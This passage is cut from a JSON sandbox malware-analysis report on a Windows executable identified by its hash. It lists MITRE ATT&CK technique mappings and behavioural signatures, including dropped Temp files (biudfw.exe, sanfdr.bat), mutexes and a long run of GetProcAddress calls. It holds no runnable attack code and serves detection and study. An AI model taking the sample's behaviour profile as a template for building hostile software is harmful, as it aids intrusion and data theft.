"attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 4, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\biudfw.exe\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\sanfdr.bat\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetTempPathW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter DeleteFileW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetVersionExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter LCMapStringW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter LoadLibraryW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter OutputDebugStringW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter WriteConsoleW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter FlushFileBuffers (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetStdHandle (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter OpenEventW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetStringTypeW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetCPInfo (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetOEMCP (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter IsValidCodePage (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetFilePointerEx (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter FreeEnvironmentStringsW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentStringsW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter DeleteCriticalSection (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetCommandLineW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter UnhandledExceptionFilter (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetLastError (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter TlsAlloc (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter TlsGetValue (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter TlsSetValue (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter TlsFree (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter EnterCriticalSection (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter LeaveCriticalSection (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetConsoleMode (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter ReadConsoleW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetConsoleCP (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter LoadAcceleratorsW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter LoadCursorW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegisterClassExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CreateWindowExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter DialogBoxParamW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter wsprintfW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter LoadIconW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter EndDialog (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter EndPaint (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter BeginPaint (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter DefWindowProcW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter ShellExecuteW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetThreadStackGuarantee (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetLogicalProcessorInformation (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter SetDefaultDllDirectories (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter EnumSystemLocalesEx (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetDateFormatEx (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetTimeFormatEx (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter IsValidLocaleName (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetProcAddress\" with a parameter 